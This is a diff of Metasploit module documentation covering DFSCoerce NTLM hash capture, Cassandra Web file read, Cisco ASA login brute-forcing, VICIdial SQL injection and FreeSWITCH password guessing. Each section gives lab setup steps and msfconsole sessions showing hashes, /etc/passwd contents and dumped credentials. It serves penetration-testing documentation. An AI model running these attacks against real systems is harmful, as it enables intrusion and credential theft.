+msf6 auxiliary(server/capture/smb) > use auxiliary/scanner/dcerpc/dfscoerce 
+msf6 auxiliary(scanner/dcerpc/dfscoerce) > set RHOSTS 192.168.159.96
+RHOSTS => 192.168.159.96
+msf6 auxiliary(scanner/dcerpc/dfscoerce) > set VERBOSE true
+VERBOSE => true
+msf6 auxiliary(scanner/dcerpc/dfscoerce) > set SMBUser aliddle
+SMBUser => aliddle
+msf6 auxiliary(scanner/dcerpc/dfscoerce) > set SMBPass Password1
+SMBPass => Password1
+msf6 auxiliary(scanner/dcerpc/dfscoerce) > run
+
+[*] 192.168.159.96:445    - Connecting to Distributed File System (DFS) Namespace Management Protocol
+[*] 192.168.159.96:445    - Binding to \netdfs...
+[+] 192.168.159.96:445    - Bound to \netdfs
+[+] Received SMB connection on Auth Capture Server!
+[SMB] NTLMv2-SSP Client     : 192.168.250.237
+[SMB] NTLMv2-SSP Username   : MSFLAB\WIN-3MSP8K2LCGC$
+[SMB] NTLMv2-SSP Hash       : WIN-3MSP8K2LCGC$::MSFLAB:971293df35be0d1c:804d2d329912e92a442698d0c6c94f08:01010000000000000088afa3c78cd801bc3c7ed684c95125000000000200120057004f0052004b00470052004f00550050000100120057004f0052004b00470052004f00550050000400120057004f0052004b00470052004f00550050000300120057004f0052004b00470052004f0055005000070008000088afa3c78cd80106000400020000000800300030000000000000000000000000400000f0ba0ee40cb1f6efed7ad8606610712042fbfffb837f66d85a2dfc3aa03019b00a001000000000000000000000000000000000000900280063006900660073002f003100390032002e003100360038002e003200350030002e003100330034000000000000000000
+
+[+] 192.168.159.96:445    - Server responded with ERROR_ACCESS_DENIED which indicates that the attack was successful
+[*] 192.168.159.96:445    - Scanned 1 of 1 hosts (100% complete)
+[*] Auxiliary module execution completed
+msf6 auxiliary(scanner/dcerpc/dfscoerce) >
+```
@@ -0,0 +1,100 @@
+## Vulnerable Application
+[Cassandra Web](https://rubygems.org/gems/cassandra-web) is an interface for Apache Cassandra using Ruby, Event-machine, AngularJS,
+Server-Sent-Events and DataStaxRuby driver for Apache Cassandra.
+
+This module has been tested successfully on Cassandra Web versions:
+* cassandra-web-0.5.0 on Debian 10.11 (buster) with ruby 2.5.5p157 and Apache Cassandra 3.11.13
+
+### Description
+
+This module exploits an unauthenticated directory traversal vulnerability in Cassandra Web
+'Cassandra Web' version 0.5.0 and earlier, allowing arbitrary file read with the web server privileges.
+This vulnerability occured due to the disabled Rack::Protection module.
+
+This web service listens on TCP port 3000 by default on all network interface.
+
+Source and Installers:
+* [Source Code Repository](https://github.com/avalanche123/cassandra-web)
+* [Installers](https://rubygems.org/gems/cassandra-web)
+
+Ruby installation:
+```
+apt install ruby-full -y
+```
+
+Gem installation:
+```
+gem install cassandra-web
+```
+
+Apache Cassandra Installation:
+```
+cat << EOF > /etc/apt/sources.list.d/cassandra.list
+deb https://www.apache.org/dist/cassandra/debian 311x main
+EOF
+cat << EOF > /etc/apt/sources.list.d/adoptopenjdk.list
+deb https://adoptopenjdk.jfrog.io/adoptopenjdk/deb/ buster main
+EOF
+wget -q -O - https://www.apache.org/dist/cassandra/KEYS | apt-key add -
+wget -qO - https://adoptopenjdk.jfrog.io/adoptopenjdk/api/gpg/key/public | apt-key add -
+apt update && apt install adoptopenjdk-8-hotspot cassandra -y
+```
+
+Run Cassandra Web:
+```
+cassandra-web
+```
+
+## Verification Steps
+1. Do: `use auxiliary/scanner/http/cassandra_web_file_read.rb`
+2. Do: `set RHOSTS [ips]`
+3. Do: `run`
+
+## Options
+
+## Scenarios
+### Cassandra Web 0.5.0 Linux Debian 10.11 (Ruby 2.5.5p157 and Apache Cassandra 3.11.13)
+```
+msf6 > use auxiliary/scanner/http/cassandra_web_file_read
+msf6 auxiliary(scanner/http/cassandra_web_file_read) > set RHOSTS 192.168.56.1
+RHOSTS => 192.168.56.1
+msf6 auxiliary(scanner/http/cassandra_web_file_read) > run
+
+[*] Running automatic check ("set AutoCheck false" to disable)
+[+] The target appears to be vulnerable. Cassandra Web Detected
+[*] Downloading file...
+
+root:x:0:0:root:/root:/bin/bash
+daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
+bin:x:2:2:bin:/bin:/usr/sbin/nologin
+sys:x:3:3:sys:/dev:/usr/sbin/nologin
+sync:x:4:65534:sync:/bin:/bin/sync
+games:x:5:60:games:/usr/games:/usr/sbin/nologin
+man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
+lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
+mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
+news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
+uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
+proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
+www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
+backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
+list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
+irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
+gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
+nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
+_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
+systemd-timesync:x:101:102:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
+systemd-network:x:102:103:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
+systemd-resolve:x:103:104:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
+messagebus:x:104:110::/nonexistent:/usr/sbin/nologin
+avahi-autoipd:x:105:112:Avahi autoip daemon,,,:/var/lib/avahi-autoipd:/usr/sbin/nologin
+sshd:x:106:65534::/run/sshd:/usr/sbin/nologin
+systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
+ntp:x:107:115::/nonexistent:/usr/sbin/nologin
+cassandra:x:108:116:Cassandra database,,,:/var/lib/cassandra:/usr/sbin/nologin
+
+
+[+] File saved in: /home/git/.msf4/loot/20220802185716_default_192.168.56.1_cassandra.web.tr_160962.txt
+[*] Scanned 1 of 1 hosts (100% complete)
+[*] Auxiliary module execution completed
+```
@@ -0,0 +1,132 @@
+## Vulnerable Application
+
+### Description
+
+This module scans for the Cisco ASA ASDM landing page and performs login brute-force
+to identify valid credentials.
+
+### Installation
+
+Acquire a Cisco ASA device or virtual machine. For this description we will use
+Cisco Adaptive Security Virtual Appliance (ASAv) VMWare Package 9.18.1 (asav9-18-1.zip):
+
+* https://software.cisco.com/download/home/286119613/type/280775065/release/9.18.1
+
+The [official installation guide can be found here](https://www.cisco.com/c/en/us/td/docs/security/asa/asa98/asav/quick-start-book/asav-98-qsg/asav-vmware.html)
+But for completeness, the following will guide the user to a full testing configuration.
+To start we'll make ASDM remotely accessible:
+
+1. Unzip the package
+1. Import `asav-esxi.ovf` in VMWare Fusion (or your VMWare product of choice).
+1. Select the `ASAv5 - 1 Core / 2 GB (100 Mbps)` deployment option.
+1. After the import is complete, assign `Network Adapter` (1 is implied) the desired
+interface (e.g. I'll use `Wi-Fi` for my setup).
+1. Start the virtual machine
+1. Allow GRUB to boot the first option (this should happen twice)
+1. When provided with a command prompt (`ciscoasa>`) type `en`.
+1. Set an enable password (e.g. `labpass1`)
+1. Enter the following in the command line interface:
+1. `conf t`
+1. `No`
+1. `interface GigabitEthernet 0/0`
+1. `nameif outside`
+1. Assign a static ip address (note the assigned address should make sense within the
+context of you lab. For example, my lab network is 10.9.49.0/24): `ip address 10.9.49.201 255.255.255.0`
+1. `no shutdown`
+1. `exit`
+1. Set the default route (the last IP should point to your lab router): `route outside 0.0.0.0 0.0.0.0 10.9.49.1`
+1. Verify you can ping an outside host (e.g. `ping 8.8.8.8`)
+1. `http server enable`
+1. `http 0.0.0.0 0.0.0.0 outside`
+1. `write`
+1. `exit`
+
+You should now be able to reach the ASA's web server remotely. From a remote host, execute the following `curl`
+command to the ASA to verify as much:
+
+```
+albinolobster@ubuntu:~$ curl -kv https://10.9.49.201
+*   Trying 10.9.49.201:443...
+* TCP_NODELAY set
+...
+> GET / HTTP/1.1`
+> Host: 10.9.49.201
+> User-Agent: curl/7.68.0
+> Accept: */*
+> 
+* Mark bundle as not supporting multiuse
+< HTTP/1.1 301 Moved Permanently
+< Date: Tue, 21 Jun 2022 13:52:33 UTC
+< Strict-Transport-Security: max-age=31536000
+< X-XSS-Protection: 1
+< Connection: close
+< Location: /admin/public/index.html
+< 
+* Closing connection 0
+* TLSv1.2 (OUT), TLS alert, close notify (256):
+```
+
+You should now be able to test the credentials `<Blank>:labpass1` and `enable_15:labpass1`. To
+add additional users to test with, let's use ASDM from a Windows machine:
+
+1. Connect to your ASA's web interface (e.g. `https://10.9.49.201/admin/public/index.html`).
+1. Click "Install ASDM Launcher"
+1. Enter creds `blank`:labpass1 (where blank is nothing and labpass1 is your enable password)
+1. Install the downloaded `dm-launcher.msi` (before 7.18.1 it will be unsigned)
+1. If Java isn't installed, install Java 1.8 (current at time of writing is 8 Update 333): https://www.java.com/en/download/
+1. Start the ASDM Launcher via `C:\Program Files (x86)\Cisco Systems\ASDM\run.bat`
+1. Enter your ASAv's IP address (10.9.249.201)
+1. Enter a blank username
+1. Enter the enable password (`labpass1`)
+1. Go to `Configuration -> Device Management -> Users/AAA -> User Accounts`
+1. Click `Add`
+1. Set the username to `cisco`
+1. Set the password to `cisco123`
+1. Keep the default settings for `Access Restrictions` (Full access with privilege level of 2).
+1. Hit `OK`
+1. Hit `Apply`
+
+You should now be able to log in to the ASDM using `cisco`:`cisco123`.
+
+## Verification Steps
+
+* Follow the above instructions to configure ASAv, ASDM, and add the `cisco` user for testing
+* Do: `use auxiliary/scanner/http/cisco_asa_asdm_bruteforce`
+* Do: `set RHOST <ip>`
+* Do: `set VERBOSE false`
+* Do: `run`
+* You should see output indicating `cisco:cisco123` was successfully used for login.
+
+## Options
+
+### USERPASS_FILE
+
+File containing users and passwords separated by space, one pair per line.
+
+### USER_FILE
+
+File containing users, one per line.
+
+### PASS_FILE
+
+File containing passwords, one per line
+
+## Scenarios
+
+### ASAv 9.18.1 with ASDM enabled and the `cisco:cisco123` creds set.
+
+```
+msf6 > use auxiliary/scanner/http/cisco_asa_asdm_bruteforce
+msf6 auxiliary(scanner/http/cisco_asa_asdm_bruteforce) > set RHOST 10.9.49.201
+RHOST => 10.9.49.201
+msf6 auxiliary(scanner/http/cisco_asa_asdm_bruteforce) > set VERBOSE false
+VERBOSE => false
+msf6 auxiliary(scanner/http/cisco_asa_asdm_bruteforce) > run
+
+[*] The remote target appears to host Cisco ASA ASDM. The module will continue.
+[*] Starting login brute force...
+[+] SUCCESSFUL LOGIN - "cisco":"cisco123"
+[*] Scanned 1 of 1 hosts (100% complete)
+[*] Auxiliary module execution completed
+msf6 auxiliary(scanner/http/cisco_asa_asdm_bruteforce) > 
+```
@@ -0,0 +1,196 @@
+## Vulnerable Application
+
+### Description
+
+This module scans for Cisco ASA Clientless SSL VPN (WebVPN) web login portals and
+performs login brute-force to identify valid credentials.
+
+### Installation
+
+Acquire a Cisco ASA device or virtual machine. For this description we will use
+Cisco Adaptive Security Virtual Appliance (ASAv) VMWare Package 9.18.1 (asav9-18-1.zip):
+
+* https://software.cisco.com/download/home/286119613/type/280775065/release/9.18.1
+
+The [official installation guide can be found here](https://www.cisco.com/c/en/us/td/docs/security/asa/asa98/asav/quick-start-book/asav-98-qsg/asav-vmware.html)
+But for completeness, the following will guide the user to a full testing configuration.
+To start we'll make ASDM remotely accessible:
+
+1. Unzip the package
+1. Import `asav-esxi.ovf` in VMWare Fusion (or your VMWare product of choice).
+1. Select the `ASAv5 - 1 Core / 2 GB (100 Mbps)` deployment option.
+1. After the import is complete assign `Network Adapter` (1 is implied) the desired
+interface (e.g. I'll use `Wi-Fi` for my setup).
+1. Start the virtual machine
+1. Allow GRUB to boot the first option (this should happen twice)
+1. When provided with a command prompt (`ciscoasa>`) type `en`.
+1. Set an enable password (e.g. `labpass1`)
+1. Enter the following in the command line interface:
+1. `conf t`
+1. `No`
+1. `interface GigabitEthernet 0/0`
+1. `nameif outside`
+1. Assign a static ip address (note the assigned address should make sense within the
+context of you lab. For example, my lab network is 10.9.49.0/24): `ip address 10.9.49.201 255.255.255.0`
+1. `no shutdown`
+1. `exit`
+1. Set the default route (the last IP should point to your lab router): `route outside 0.0.0.0 0.0.0.0 10.9.49.1`
+1. Verify you can ping an outside host (e.g. `ping 8.8.8.8`)
+1. `http server enable`
+1. `http 0.0.0.0 0.0.0.0 outside`
+1. `write`
+1. `exit`
+
+You should now be able to reach the ASA's web server remotely. From a remote host, execute the following `curl`
+command to the ASA to verify as much:
+
+```
+albinolobster@ubuntu:~$ curl -kv https://10.9.49.201
+*   Trying 10.9.49.201:443...
+* TCP_NODELAY set
+...
+> GET / HTTP/1.1`
+> Host: 10.9.49.201
+> User-Agent: curl/7.68.0
+> Accept: */*
+> 
+* Mark bundle as not supporting multiuse
+< HTTP/1.1 301 Moved Permanently
+< Date: Tue, 21 Jun 2022 13:52:33 UTC
+< Strict-Transport-Security: max-age=31536000
+< X-XSS-Protection: 1
+< Connection: close
+< Location: /admin/public/index.html
+< 
+* Closing connection 0
+* TLSv1.2 (OUT), TLS alert, close notify (256):
+```
+
+The next part of the installation will require a Windows machine. From your Windows machine:
+
+1. Connect to your ASA's web interface (e.g. `https://10.9.49.201/admin/public/index.html`).
+1. Click "Install ASDM Launcher"
+1. Enter creds `blank`:labpass1 (where blank is nothing and labpass1 is your enable password)
+1. Install the downloaded `dm-launcher.msi` (before 7.18.1 it will be unsigned)
+1. If Java isn't installed, intall Java 1.8 (current at time of writing is 8 Update 333): https://www.java.com/en/download/
+1. Start the ASDM Launcher via `C:\Program Files (x86)\Cisco Systems\ASDM\run.bat`
+1. Enter your ASAv's IP address (10.9.249.201)
+1. Enter a blank username
+1. Enter the enable password (`labpass1`)
+
+Now to enable the webvpn interface from ASDM:
+
+1. Go to `Configuration -> Remote Access VPN -> Clientless SSL VPN Access -> Connection Profiles`
+1. In the `Access Interfaces` view, click the radio button to `Allow Access` from the `outside` interface
+1. Hit apply
+
+Verify that the Clientless SSL VPN is now enabled by navigating to the SSL VPN login on your ASA. For example,
+navigate to `https://10.9.49.201/+CSCOE+/logon.html`.
+
+Next, we'll create a Clientless SSL VPN user for brute-force testing. From ASDM:
+
+1. Go to `Configuration -> Device Management -> Users/AAA -> User Accounts`
+1. Click `Add`
+1. Keep the default username (`user1`)
+1. Enter and confirm a password (e.g. `user1`)
+1. Set the privilege level to 0 (I'm not sure this step is actually required but)
+1. Select the `No ASDM, SSH, Telnet, or Console access` radio
+1. Hit `OK`
+1. Hit `Apply`
+
+Finally, we'll enable logging into the SSL VPN portal:
+
+1. Go to `Configuration -> Device Management -> Users/AAA -> Dynamic Access Policies`
+1. Select the `DfltAccessPolicy` and click `Edit`
+1. Select `Access Method` tab
+1. Click on the `Web-Portal` radio button
+
+You should now be able to log in to the SSL VPN web portal using `user1`:`user1`.
+
+## Verification Steps
+
+* Follow the above instructions to configure ASAv, Clientless SSL VPN, and add a user for testing
+* Add the user to `data/wordlists/http_default_userpass.txt` as `user1 user1`
+* Do: `use auxiliary/scanner/http/cisco_asa_clientless_vpn`
+* Do: `set RHOST <ip>`
+* Do: `set VERBOSE false`
+* Do: `run`
+* You should see output indicating `user1:user1` was successfully used for login.
+
+## Options
+
+### GROUP
+
+The connection profile to use. By default this is blank, but administrators can configure various different
+profiles that users can select from the drop down menu at the top of the login page. The alias in the drop
+down is *not* the value of `GROUP`. You need to extract it from the HTML.
+
+For example, my administrator has a profile named `TunnelGroup1` using the alias `alias1`. The drop down menu
+will show `alias1` but `TunnelGroup1` is the required value. In the page's HTML you'll find:
+
+```
+<option value="TunnelGroup1" selected>alias1</option>
+```
+
+To use `TunnelGroup1` you'd `set GROUP TunnelGroup1`.
+
+### USERPASS_FILE
+
+File containing users and passwords separated by space, one pair per line.
+
+### USER_FILE
+
+File containing users, one per line.
+
+### PASS_FILE
+
+File containing passwords, one per line
+
+## Scenarios
+
+### ASAv 9.18.1 with Clientless SSL VPN enabled and the `user1:user1` creds set.
+
+Simply using the default HTTP username and password lists and `user1:user1` added to
+`data/wordlists/http_default_userpass.txt`.
+
+```
+msf6 auxiliary(scanner/http/cisco_asa_clientless_vpn) > use auxiliary/scanner/http/cisco_asa_clientless_vpn
+msf6 auxiliary(scanner/http/cisco_asa_clientless_vpn) > set VERBOSE false
+VERBOSE => false
+msf6 auxiliary(scanner/http/cisco_asa_clientless_vpn) > set RHOST 10.9.49.201
+RHOST => 10.9.49.201
+msf6 auxiliary(scanner/http/cisco_asa_clientless_vpn) > run
+
+[*] The remote target appears to host Cisco SSL VPN Service. The module will continue.
+[*] Starting login brute force...
+[+] SUCCESSFUL LOGIN - "user1":"user1"
+[*] Scanned 1 of 1 hosts (100% complete)
+[*] Auxiliary module execution completed
+msf6 auxiliary(scanner/http/cisco_asa_clientless_vpn) > 
+```
+
+## ASAv 9.18.1 with Clientless SSL VPN enabled and the `user1:user1` on the `TunnelGroup1` Connection Profile
+
+```
+msf6 auxiliary(scanner/http/cisco_asa_clientless_vpn) > use auxiliary/scanner/http/cisco_asa_clientless_vpn
+msf6 auxiliary(scanner/http/cisco_asa_clientless_vpn) > set VERBOSE false
+VERBOSE => false
+msf6 auxiliary(scanner/http/cisco_asa_clientless_vpn) > set RHOST 10.9.49.201
+RHOST => 10.9.49.201
+msf6 auxiliary(scanner/http/cisco_asa_clientless_vpn) > run
+
+[*] The remote target appears to host Cisco SSL VPN Service. The module will continue.
+[*] Starting login brute force...
+[*] Scanned 1 of 1 hosts (100% complete)
+[*] Auxiliary module execution completed
+msf6 auxiliary(scanner/http/cisco_asa_clientless_vpn) > set GROUP TunnelGroup1
+GROUP => TunnelGroup1
+msf6 auxiliary(scanner/http/cisco_asa_clientless_vpn) > run
+
+[*] The remote target appears to host Cisco SSL VPN Service. The module will continue.
+[*] Starting login brute force...
+[+] SUCCESSFUL LOGIN - "user1":"user1"
+[*] Scanned 1 of 1 hosts (100% complete)
+[*] Auxiliary module execution completed
+msf6 auxiliary(scanner/http/cisco_asa_clientless_vpn) > 
+```
@@ -5,6 +5,8 @@ default username and password.  Tested against Dell Remote Access:

 - Controller 6 - Express version 1.50 and 1.85,
 - Controller 7 - Enterprise 2.63.60.62
+- Controller 8 - Enterprise 2.83.05
+- Controller 9 - Enterprise 4.40.00.00

 ## Verification Steps

@@ -1,47 +0,0 @@
-## Description
-
-This module queries a host or range of hosts and pull the SSL certificate information if one is installed.
-
-## Verification Steps
-
-1. Do: ```use auxiliary/scanner/http/ssl```
-2. Do: ```set RHOSTS [IP]```
-3. Do: ```set THREADS [num of threads]```
-4. Do: ```run```
-
-## Scenarios
-
-```
-msf > use auxiliary/scanner/http/ssl
-msf auxiliary(ssl) > set RHOSTS 192.168.1.200-254
-RHOSTS => 192.168.1.200-254
-msf auxiliary(ssl) > set THREADS 20
-THREADS => 20
-msf auxiliary(ssl) > run
-
-[*] Error: 192.168.1.205: OpenSSL::SSL::SSLError SSL_connect SYSCALL returned=5 errno=0 state=SSLv3 read server hello A
-[*] Error: 192.168.1.206: OpenSSL::SSL::SSLError SSL_connect SYSCALL returned=5 errno=0 state=SSLv3 read server hello A
-[*] 192.168.1.208:443 Subject: /C=--/ST=SomeState/L=SomeCity/O=SomeOrganization/OU=SomeOrganizationalUnit/CN=localhost.localdomain/emailAddress=root@localhost.localdomain Signature Alg: md5WithRSAEncryption
-[*] 192.168.1.208:443 WARNING: Signature algorithm using MD5 (md5WithRSAEncryption)
-[*] 192.168.1.208:443 has common name localhost.localdomain
-[*] 192.168.1.211:443 Subject: /C=--/ST=SomeState/L=SomeCity/O=SomeOrganization/OU=SomeOrganizationalUnit/CN=localhost.localdomain/emailAddress=root@localhost.localdomain Signature Alg: sha1WithRSAEncryption
-[*] 192.168.1.211:443 has common name localhost.localdomain
-[*] Scanned 13 of 55 hosts (023% complete)
-[*] Error: 192.168.1.227: OpenSSL::SSL::SSLError SSL_connect SYSCALL returned=5 errno=0 state=SSLv3 read server hello A
-[*] 192.168.1.223:443 Subject: /CN=localhost Signature Alg: sha1WithRSAEncryption
-[*] 192.168.1.223:443 has common name localhost
-[*] 192.168.1.222:443 WARNING: Signature algorithm using MD5 (md5WithRSAEncryption)
-[*] 192.168.1.222:443 has common name MAILMAN
-[*] Scanned 30 of 55 hosts (054% complete)
-[*] Scanned 31 of 55 hosts (056% complete)
-[*] Scanned 39 of 55 hosts (070% complete)
-[*] Scanned 41 of 55 hosts (074% complete)
-[*] Scanned 43 of 55 hosts (078% complete)
-[*] Scanned 45 of 55 hosts (081% complete)
-[*] Scanned 46 of 55 hosts (083% complete)
-[*] Scanned 53 of 55 hosts (096% complete)
-[*] Scanned 55 of 55 hosts (100% complete)
-[*] Auxiliary module execution completed
-msf auxiliary(ssl) >
-```
-
@@ -0,0 +1,212 @@
+## Vulnerable Application
+
+This module exploits several authenticated SQL Inject vulnerabilities in VICIdial 2.14b0.5 prior to
+svn/trunk revision 3555 (VICIBox 10.0.0, prior to January 20 is vulnerable).
+
+- Injection point 1 is on vicidial/admin.php when adding a user, in the modify_email_accounts parameter.
+- Injection point 2 is on vicidial/admin.php when adding a user, in the access_recordings parameter.
+- Injection point 3 is on vicidial/admin.php when adding a user, in the agentcall_email parameter.
+- Injection point 4 is on vicidial/AST_agent_time_sheet.php when adding a user, in the agent parameter.
+- Injection point 5 is on vicidial/user_stats.php when adding a user, in the file_download parameter.
+
+|                                           | v9.0.3                         | v10.0.0                        |
+| ----------------------------------------- | ------------------------------ | ------------------------------ |
+| List Users - access_recordings method     | X                              | X                              |
+| List Users - agent_time_sheet method      | `view reports` must be enabled | `view reports` must be enabled |
+| List Users - agentcall_email method       | X                              | X                              |
+| List Users - modify_email_accounts method | X                              | X                              |
+| List Users - user_stats method            | `view reports` must be enabled | `view reports` must be enabled |
+
+VICIdial does not encrypt passwords by default.
+
+VICIBox/VICIdial includes an auto-update mechanism, so be aware for creating vulnerable boxes.
+
+### Install
+
+#### 9.0.3 & 10.0.0
+
+1. Install the following OpenSUSE 10 ISO [ViciBox_v9.x86_64-9.0.3.iso](http://download.vicidial.com/iso/vicibox/server/ViciBox_v9.x86_64-9.0.3.iso)
+or [ViciBox_v10.x86_64-10.0.0.iso](http://download.vicidial.com/iso/vicibox/server/archive/ViciBox_v10.x86_64-10.0.0.iso) :
+    1. Change the default password (`root`:`vicidial`)
+    2. Set Timezone, Keyboard Layout, ok the license, and Language
+    3. Network settings should autoconfigure (Tested on VMware Fusion). Network settings can be configured with the 
+        command `yast lan` if necessary
+2. Run `vicibox-express` to initiate the ViciDial Express Installation, everything can be kept as default
+3. Navigate to `http://<ip-address>/`
+    1. Click `Administration` and login with default credentials username: `6666`, password: `1234`
+    2. Once logged in, Click `Continue on to the Initial Setup`. Everything can be kept as default. 
+4. The complete list of setup instructions can be found by following this [link](http://download.vicidial.com/iso/vicibox/server/ViciBox_v9-install.pdf)
+
+
+## Verification Steps
+
+1. Start msfconsole
+1. Do: `use auxiliary/scanner/http/vicidial_multiple_sqli`
+1. Do: `set username <username>`
+1. Do: `set password <password>`
+1. Do `show actions`
+   1. Select from the list or keep the default
+1. Do: `run`
+1. The module will exploit the selected SQL injection and return the extracted usernames and passwords
+
+## Options
+
+### Password
+
+Password for the vicidial instance that corresponds to the username.
+
+### Username
+
+Username for the user to login with. Defaults to admin username of `6666`.
+
+## Scenarios
+
+### ViciBox 9.0.3 - List Users - modify_email_accounts method
+
+```
+msf6 use auxiliary/scanner/http/vicidial_multiple_sqli
+msf6 auxiliary(scanner/http/vicidial_multiple_sqli) > set rhosts 1.1.1.1
+rhosts => 1.1.1.1
+msf6 auxiliary(scanner/http/vicidial_multiple_sqli) > set verbose true
+verbose => true
+msf6 auxiliary(scanner/http/vicidial_multiple_sqli) > set password notpassword
+password => notpassword
+msf6 auxiliary(scanner/http/vicidial_multiple_sqli) > set action List Users - modify_email_accounts method
+action => List Users - modify_email_accounts method
+msf6 auxiliary(scanner/http/vicidial_multiple_sqli) > run
+
+[*] Enumerating Usernames and Password Hashes
+[*] {SQLi} Executing (select group_concat(TXMlUAF) from (select cast(concat_ws(';',ifnull(user,''),ifnull(pass,'')) as binary) TXMlUAF from vicidial_users limit 3) jUFFwQn)
+[*] {SQLi} Encoded to (select group_concat(TXMlUAF) from (select cast(concat_ws(0x3b,ifnull(user,repeat(0x87,0)),ifnull(pass,repeat(0x52,0))) as binary) TXMlUAF from vicidial_users limit 3) jUFFwQn)
+[*] {SQLi} Time-based injection: expecting output of length 46
+[!] No active DB -- Credential data will not be saved!
+[+] Dumped table contents:
+vicidial_users
+==============
+
+ user  pass
+ ----  ----
+ 6666  notpassword
+ VDAD  donotedit
+ VDCL  donotedit
+
+[*] Scanned 1 of 1 hosts (100% complete)
+[*] Auxiliary module execution completed
+```
+
+### ViciBox 9.0.3 - List Users - access_recordings method
+
+```
+msf6 use auxiliary/scanner/http/vicidial_multiple_sqli
+msf6 auxiliary(scanner/http/vicidial_multiple_sqli) > set rhosts 1.1.1.1
+rhosts => 1.1.1.1
+msf6 auxiliary(scanner/http/vicidial_multiple_sqli) > set verbose true
+verbose => true
+msf6 auxiliary(scanner/http/vicidial_multiple_sqli) > set password notpassword
+password => notpassword
+msf6 auxiliary(scanner/http/vicidial_multiple_sqli) > set action List Users - access_recordings method
+action => List Users - access_recordings method
+msf6 auxiliary(scanner/http/vicidial_multiple_sqli) > run
+
+[*] Enumerating Usernames and Password Hashes
+[+] Dumped table contents:
+vicidial_users
+==============
+
+ user  pass
+ ----  ----
+ 6666  notpassword
+ VDAD  donotedit
+ VDCL  donotedit
+
+[*] Scanned 1 of 1 hosts (100% complete)
+[*] Auxiliary module execution completed
+```
+
+### ViciBox 9.0.3 - List Users - agent_time_sheet method
+
+```
+msf6 use auxiliary/scanner/http/vicidial_multiple_sqli
+msf6 auxiliary(scanner/http/vicidial_multiple_sqli) > set rhosts 1.1.1.1
+rhosts => 1.1.1.1
+msf6 auxiliary(scanner/http/vicidial_multiple_sqli) > set verbose true
+verbose => true
+msf6 auxiliary(scanner/http/vicidial_multiple_sqli) > set password notpassword
+password => notpassword
+msf6 auxiliary(scanner/http/vicidial_multiple_sqli) > set action List Users - agent_time_sheet method
+action => List Users - agent_time_sheet method
+msf6 auxiliary(scanner/http/vicidial_multiple_sqli) > run
+
+[*] Enumerating Usernames and Password Hashes
+[+] Dumped table contents:
+vicidial_users
+==============
+
+ user  pass
+ ----  ----
+ 6666  notpassword
+ VDAD  donotedit
+ VDCL  donotedit
+
+[*] Scanned 1 of 1 hosts (100% complete)
+[*] Auxiliary module execution completed
+```
+
+### ViciBox 9.0.3 - List Users - agentcall_email method
+
+```
+msf6 use auxiliary/scanner/http/vicidial_multiple_sqli
+msf6 auxiliary(scanner/http/vicidial_multiple_sqli) > set rhosts 1.1.1.1
+rhosts => 1.1.1.1
+msf6 auxiliary(scanner/http/vicidial_multiple_sqli) > set verbose true
+verbose => true
+msf6 auxiliary(scanner/http/vicidial_multiple_sqli) > set password notpassword
+password => notpassword
+msf6 auxiliary(scanner/http/vicidial_multiple_sqli) > set action List Users - agentcall_email method
+action => List Users - agentcall_email method
+msf6 auxiliary(scanner/http/vicidial_multiple_sqli) > run
+
+[*] Enumerating Usernames and Password Hashes
+[+] Dumped table contents:
+vicidial_users
+==============
+
+ user  pass
+ ----  ----
+ 6666  notpassword
+ VDAD  donotedit
+ VDCL  donotedit
+
+[*] Scanned 1 of 1 hosts (100% complete)
+[*] Auxiliary module execution completed
+```
+
+
+### ViciBox 9.0.3 - List Users - user_stats method
+
+```
+msf6 use auxiliary/scanner/http/vicidial_multiple_sqli
+msf6 auxiliary(scanner/http/vicidial_multiple_sqli) > set rhosts 1.1.1.1
+rhosts => 1.1.1.1
+msf6 auxiliary(scanner/http/vicidial_multiple_sqli) > set verbose true
+verbose => true
+msf6 auxiliary(scanner/http/vicidial_multiple_sqli) > set password notpassword
+password => notpassword
+msf6 auxiliary(scanner/http/vicidial_multiple_sqli) > set action List Users - user_stats method
+action => List Users - user_stats method
+msf6 auxiliary(scanner/http/vicidial_multiple_sqli) > run
+
+[*] Enumerating Usernames and Password Hashes
+[+] Dumped table contents:
+vicidial_users
+==============
+
+ user  pass
+ ----  ----
+ 6666  notpassword
+ VDAD  donotedit
+ VDCL  donotedit
+
+[*] Scanned 1 of 1 hosts (100% complete)
+[*] Auxiliary module execution completed
+```
@@ -0,0 +1,65 @@
+## Vulnerable Application
+[FreeSWITCH](https://freeswitch.com/) is a free and open-source software defined telecommunications stack for real-time communication,
+WebRTC, telecommunications, video, and Voice over Internet Protocol.
+
+The [Event Socket](https://freeswitch.org/confluence/display/FREESWITCH/mod_event_socket) `mod_event_socket` is a TCP based interface to
+control FreeSWITCH and is enabled by default.
+
+This module has been tested successfully on FreeSWITCH versions:
+* 1.10.7-release-19-883d2cb662~64bit on Debian 10.11 (buster)
+
+### Description
+
+This module is a login utility to find the password of the FreeSWITCH event socket service by bruteforcing the login interface.
+Note that this service does not require a username to log in; login is done purely via supplying a valid password.
+This module will stops as soon as a valid password is found.
+
+This service is enabled by default and listens on TCP port 8021 on the local network interface.
+
+Source and Installers:
+* [Source Code Repository](https://github.com/signalwire/freeswitch)
+* [Installers](https://freeswitch.org/confluence/display/FREESWITCH/Installation)
+* [Virtual Machine](https://freeswitch.com/index.php/fs-virtual-machine/)
+* [Docker](https://github.com/drachtio/docker-drachtio-freeswitch-mrf)
+
+Docker installation:
+```
+docker pull drachtio/drachtio-freeswitch-mrf
+docker run -d --rm --name FS1 --net=host \
